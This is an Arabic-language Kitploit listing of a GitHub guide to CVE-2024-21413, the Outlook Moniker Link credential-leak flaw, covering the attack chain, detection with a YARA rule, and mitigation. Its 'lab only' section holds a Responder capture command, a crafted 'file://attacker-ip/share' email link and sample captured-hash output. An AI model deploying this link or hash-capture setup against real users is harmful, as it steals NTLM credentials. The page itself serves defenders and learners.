Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Moniker-Link--CVE-2024-21413- | Kitploit
أدوات/GitHubGitHub/bhatbhupendra/moniker-link--cve-2024-21413-
كسر كلمات المرورأدوات التصيدتحليل الثغرات الأمنيةالاستغلالالتهرب من IDS/IPSالحركة الجانبيةاختبار الاختراقالتعلم والتعليمالفريق الأحمر

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
أمان البريد الإلكتروني
GitHubbhatbhupendra/moniker-link--cve-2024-21413-

Moniker-Link--CVE-2024-21413-

عرض المستودع
منذ 3 أشهرلم تتم المراجعة بعد

🔗 Moniker Link (CVE-2024-21413) — دليل عملي لثغرة Outlook ذات النقر الصفري


📌 1. مقدمة

CVE-2024-21413، المعروفة باسم ثغرة Moniker Link، هي خلل أمني خطير في Microsoft Outlook يمكّن المهاجمين من تسريب بيانات اعتماد المستخدمين دون الحاجة إلى أي تفاعل.

على عكس هجمات التصيد التقليدية، يمكن تفعيل هذه الثغرة بمجرد معاينة رسالة بريد إلكتروني، مما يجعلها خطيرة بشكل خاص في بيئات المؤسسات.

يكمن السبب في طريقة معالجة Outlook لـ روابط moniker، مما يؤدي إلى محاولات مصادقة غير مقصودة إلى أنظمة يتحكم فيها المهاجم.


🧠 2. المفاهيم الأساسية

يعد فهم المفاهيم التالية أمرًا ضروريًا:

🔹 Moniker Link

آلية خاصة بنظام Windows تسمح للتطبيقات بالإشارة إلى موارد خارجية باستخدام بروتوكولات مثل:

  • file://
  • unc://

🔹 مصادقة NTLM

  • بروتوكول مصادقة Windows قديم
  • يرسل تلقائيًا بيانات اعتماد مُجزّأة (hashed) عند الوصول إلى موارد بعيدة
  • عرضة لـ التقاط بيانات الاعتماد وهجمات إعادة التوجيه (relay attacks)

🔹 مسار UNC (اصطلاح تسمية شامل)

root@kitploit:~
\\attacker-server\share

يُستخدم للوصول إلى الموارد المشتركة عبر الشبكة. في هذه الثغرة، يُساء استخدامه لإجبار طلبات المصادقة.

🔹 تجاوز العرض المحمي (Protected View)

تم تصميم العرض المحمي في Outlook لعزل المحتوى غير الآمن. هذه الثغرة تتجاوز تلك الحماية، مما يسمح بالوصول إلى الموارد الخارجية.


⚙️ 3. كيف تعمل الثغرة

سلسلة الهجوم (خطوة بخطوة)

  1. إعداد الحمولة (Payload)

    • يدمج المهاجم رابط moniker خبيثًا (مثل file://attacker-server/share) داخل بريد إلكتروني.
  2. التسليم

    • يُرسل البريد الإلكتروني إلى الضحية.
  3. التفعيل

    • تقوم الضحية بمعاينة البريد أو فتحه في Outlook.
  4. المعالجة التلقائية

    • يعالج Outlook الرابط دون أي تفاعل من المستخدم.
  5. طلب المصادقة

    • يحاول Windows إجراء مصادقة NTLM تجاه خادم المهاجم.
  6. كشف بيانات الاعتماد

    • يلتقط المهاجم تجزئة NTLM.

مخطط سلسلة الهجوم

root@kitploit:~
[Attacker]
    |
    | 1. Send crafted email
    v
[Victim Outlook]
    |
    | 2. Auto-process moniker link
    v
[Windows System]
    |
    | 3. NTLM authentication attempt
    v
[Attacker Server]
    |
    | 4. Capture NTLM hash
    v
[Credential Abuse / Lateral Movement]

🌍 4. التأثير الواقعي

سيناريوهات الهجوم الشائعة

  • حملات تصيد موجهة ضد المؤسسات
  • جمع بيانات الاعتماد في الشبكات المؤسسية
  • وصول أولي للحركة الجانبية

أهداف المهاجم

  • التقاط تجزئات NTLM
  • إعادة توجيه المصادقة إلى الخدمات الداخلية
  • تصعيد الامتيازات داخل الشبكة

🛠️ 5. الأدوات والتقنيات

أدوات هجومية / بحثية

  • Responder — يلتقط تجزئات مصادقة NTLM
  • Impacket — مجموعة أدوات لاستغلال الشبكات
  • ntlmrelayx.py — ينفذ هجمات إعادة توجيه NTLM

أدوات دفاعية

  • Microsoft Defender — اكتشاف نقاط النهاية والاستجابة لها
  • Wireshark — فحص حركة مرور الشبكة
  • Sysmon — تسجيل أحداث النظام المتقدم

💻 6. مثال عملي (لبيئة المختبر فقط)

⚠️ نفّذ ذلك فقط في بيئات مختبرية خاضعة للتحكم

تشغيل خدمة التقاط NTLM

root@kitploit:~
sudo responder -I eth0

مثال على رابط خبيث

root@kitploit:~
<a href="file://attacker-ip/share">Open Document</a>

المخرجات المتوقعة

root@kitploit:~
[SMB] NTLMv2 Hash captured
User: victim

🛡️ 7. الاكتشاف (قاعدة YARA)

تم تطوير قاعدة كشف بواسطة Florian Roth لتحديد محاولات الاستغلال التي تنطوي على روابط moniker.

مثال على قاعدة YARA

root@kitploit:~
rule Outlook_MonikerLink_CVE_2024_21413
{
    meta:
        description = "Detects Outlook Moniker Link exploitation via file:// or UNC paths"
        author = "Florian Roth"
        reference = "CVE-2024-21413"
    
    strings:
        $a = "file://"
        $b = "\\\\"
    
    condition:
        any of them
}

حالات استخدام الاكتشاف

  • فحص بوابات البريد الإلكتروني
  • توليد تنبيهات SIEM
  • البحث عن التهديدات (threat hunting) للروابط المشبوهة

🛡️ 8. التخفيف وأفضل الممارسات

إدارة التحديثات (Patch Management)

  • تطبيق التحديثات الأمنية المقدمة من Microsoft فورًا

تقوية المصادقة

  • تعطيل NTLM حيثما أمكن
  • فرض مصادقة Kerberos

ضوابط الشبكة

  • حظر حركة SMB الصادرة (TCP 445) إلى الشبكات الخارجية
  • تقييد الاتصالات الصادرة غير الضرورية

أمان البريد الإلكتروني

  • تصفية أو تعقيم الروابط التي تستند إلى file:// و UNC
  • استخدام حلول متقدمة للحماية من تهديدات البريد الإلكتروني

المراقبة والكشف

  • مراقبة محاولات المصادقة الصادرة
  • تسجيل والتنبيه على حركة SMB غير المعتادة

⚠️ 9. الأخطاء الشائعة

  • افتراض أن تفاعل المستخدم مطلوب
  • تجاهل المخاطر المتعلقة بـ NTLM في البيئات الحديثة
  • الاعتماد فقط على برامج مكافحة الفيروسات دون ضوابط الشبكة
  • تأخير نشر التحديثات الأمنية

🧾 10. الخلاصة

توضح CVE-2024-21413 كيف يمكن استغلال سلوكيات النظام المتكاملة بعمق (مثل المصادقة التلقائية) عبر مدخلات تبدو غير ضارة مثل روابط البريد الإلكتروني.

النقاط الرئيسية

  • ثغرة بدون نقر (zero-click) — لا تتطلب أي تفاعل من المستخدم
  • تستغل معالجة Outlook لروابط moniker
  • تؤدي إلى تسريب بيانات اعتماد NTLM
  • يمكن اكتشافها باستخدام YARA ومراقبة الشبكة
  • يمكن منعها عبر التحديثات والتكوين السليم

📚 11. قراءات إضافية

  • نشرة Microsoft الأمنية — CVE-2024-21413
  • وثائق Impacket (هجمات إعادة توجيه NTLM)
  • وثائق YARA
  • ورقة الغش الخاصة بالمصادقة من OWASP

💡 توصية: أعد إنتاج هذه الثغرة في مختبر افتراضي (مثل جهاز Windows افتراضي + جهاز مهاجم افتراضي) لفهم سلسلة الهجوم والاستراتيجيات الدفاعية بشكل كامل.

تنزيل الأداة